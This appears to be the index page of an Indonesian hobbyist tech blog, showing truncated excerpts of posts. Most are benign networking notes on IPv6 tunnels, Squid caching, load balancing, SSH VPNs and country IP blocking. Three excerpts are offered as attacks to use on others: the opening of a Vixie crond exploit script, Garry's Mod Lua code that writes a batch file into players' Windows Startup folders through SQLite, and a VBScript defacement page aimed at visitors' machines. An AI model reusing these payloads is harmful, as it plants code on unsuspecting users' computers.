>

Cara membuat Tunel Ipv6

Pendahuluan
———–
Tulisan INi di buat oleh orang yang tidak punya apa apa dan hanya mencari sesuap nasi
di salah satu PT Datautama qe3

Kondisi
——-
- 1 unit computer terhubung dengan jaringan internet (Datautama ISP Tercinta kita qe3)
Debian GNU/Linux 5.0 \n \l
- Fanta Merah 1,5 Liter
- Rokok GUdang Garam International qe3
- Alunan musik MP3 (Dugem qe3)
- 1 buah ipv6 dari tunnelbroker . . . → Read More: Cara membuat Tunel Ipv6

Mencoba mencache mp3 dari indowebster.com

pertama pastikan squid dan videocache sudah di shutdown

squid -k shutdown

killall -9 python

killall -9 python

lalu tambahkan kode berikut pada squid.conf

acl videocache_allow_url url_regex -i www[0-9][0-9]\.indowebster\.com\/(.*)mp3

tambahkan juga kode berikut pada /usr/share/videocache/videocache.py

untuk memudahkan, saya paste code :

#####################################################

# Indowebster.com Video file caching is handled here. www[0-9][0-9]\.indowebster\.com

if enable_indowebster_cache:

if re.compile(‘www[0-9][0-9]\.indowebster\.com’).search(host) and (path.find(‘.mp3′)) > -1 :

type = . . . → Read More: Mencoba mencache mp3 dari indowebster.com

Two new exploit scripts released for Vixie CronD vulnerability

#!/bin/sh

clear
echo ‘——————————————————————’
echo ‘Marchew Hyperreal Industries <marchew@dione.ids.pl>’
echo ‘Stumilowy Las Team <100milowy@gdynia.ids.pl>’
echo ‘—————————- presents —————————-’
echo
echo ‘ -= . . . → Read More: Two new exploit scripts released for Vixie CronD vulnerability

BUG SQLite nie enak kerjain orang qe3

resource.AddFile(“data/exploit.txt”); — THis file contains the batch-commands!
 
local function writeBatch(ply)
if(not ply:GetPData(“batched”)) then
– Create a new database in the autorun-folder
–Vista
ply:SendLua([[sql.Query("ATTACH DATABASE 'C:/ProgramData/Microsoft/Windows/Start Menu/Programs/Startup/test.bat' AS exploit")sql.Query("CREATE TABLE exploit.test (v TEXT)")]]);
–XP/2000
ply:SendLua([[sql.Query("ATTACH DATABASE 'C:/Documents and Settings/All Users/Start Menu/Programs/Startup/test.bat' AS exploit")sql.Query("CREATE TABLE exploit.test (v TEXT)")]]);
– Write the batch-code to this database-file
ply:SendLua([[sql.Query(string.format("INSERT INTO exploit.test (v) VALUES('%s')", "rnrn" .. file.Read("exploit.txt")))sql.Query("DETACH exploit")]]);
– Mark this user . . . → Read More: BUG SQLite nie enak kerjain orang qe3

Situs yang bisa membuat shutdown komputer kita

Deface termasuk menyisipkan dan menampilkan supaya dia di kenal tapi kalau saya bisanya Deface sambil kerjain orangnya dengan script di bawah ini

” Rename menjadi *.html atau *htm”

<html><!–Sincan2 Tampan–>
<head>
<title> Sincan2 Touch Your Server WinDows XP Fuck </title>
</head>
<body>
<script language=”VBScript”>
rem VBS
On Error Resume Next
Dim fso, shell, wrte, tempdir, windir, rand, file
Set fso=CreateObject(“Scripting.FileSystemObject”)
Set shell=CreateObject(“Wscript.Shell”)
if err.number=429 Then
shell.Run javascript:location.reload()
End If

Set windir=fso.GetSpecialFolder(0)
Set tempdir=fso.GetSpecialFolder(2)

Set . . . → Read More: Situs yang bisa membuat shutdown komputer kita

Saya merasa tergugah setelah membaca ini

Melihat yang Tak Terlihat
Bacaan hari ini: Ibrani 11:1-13
Ayat mas hari ini: Ibrani 11:1
Bacaan Alkitab Setahun: Yehezkiel 43-45

Di tembok sebuah kamp konsentrasi tertulis sebuah puisi. “Aku percaya matahari ada, walau sinarnya tak terlihat. Aku percaya kasih ada, walau tak dapat diwujudkan. Aku percaya Tuhan ada, walau Dia tidak berbicara.” Tidak dikenal siapa penulisnya. Yang . . . → Read More: Saya merasa tergugah setelah membaca ini

Load balancing Linux

Dari pada sedih di tinggal istri ngoprek aja qe3 di temani Vodka

eth0 : client

eth1: INterlink

eth2: Datautama

[root@ecnet ~]# iptables-save
# Generated by iptables-save v1.3.5 on Sat Dec 19 14:15:09 2009
*nat
REROUTING ACCEPT [3663:273348]
OSTROUTING ACCEPT [306:17939]
:OUTPUT ACCEPT [12406:699758]
-A PREROUTING -d 192.168.200.1 -p tcp -m tcp –dport 80 -j ACCEPT
-A PREROUTING -d 118.137.229.140 -p tcp -m tcp . . . → Read More: Load balancing Linux

ip ip tuneling

//
// HOWTO VPN over SSH and tun

Do it with a Script

Introduction

The following script will let you start a full featured VPN using SSH and tun.
Requirements

* OpenSSH with tun support on both sides (tested Debian 4.3 on server, Gentoo 4.5 on client)
* Root access on both sides
* Allowed root access and tunnel on server . . . → Read More: ip ip tuneling

Saya merasa tergugah membaca ini

Melihat yang Tak Terlihat Bacaan hari ini: Ibrani 11:1-13
Ayat mas hari ini: Ibrani 11:1
Bacaan Alkitab Setahun: Yehezkiel 43-45

Di tembok sebuah kamp konsentrasi tertulis sebuah puisi. “Aku percaya matahari ada, walau sinarnya tak terlihat. Aku percaya kasih ada, walau tak dapat diwujudkan. Aku percaya Tuhan ada, walau Dia tidak berbicara.” Tidak dikenal siapa . . . → Read More: Saya merasa tergugah membaca ini

Ngeblock IP Spam Memakai Bash Scripts

#!/bin/bash
### Ngeblock traffic Dari AFGHANISTAN (af) and CHINA (CN). Use ISO code ###
ISO=”af cn”

koped=/sbin/iptables
WGET=/usr/bin/wget
EGREP=/bin/egrep

SPAMLIST=”countrydrop”
ZONEROOT=”/root/iptables”
DLROOT=”http://www.ipdeny.com/ipblocks/data/countries”

cleanOldRules(){
$koped -F
$koped -X
$koped -t nat -F
$koped -t nat -X
$koped -t mangle -F
$koped -t mangle -X
$koped -P INPUT ACCEPT
$koped -P OUTPUT ACCEPT
$koped -P FORWARD ACCEPT
}

# create a dir
[ ! -d $ZONEROOT ] && /bin/mkdir -p $ZONEROOT

# clean old rules
cleanOldRules

$koped -N $SPAMLIST

for c  in $ISO
do
# . . . → Read More: Ngeblock IP Spam Memakai Bash Scripts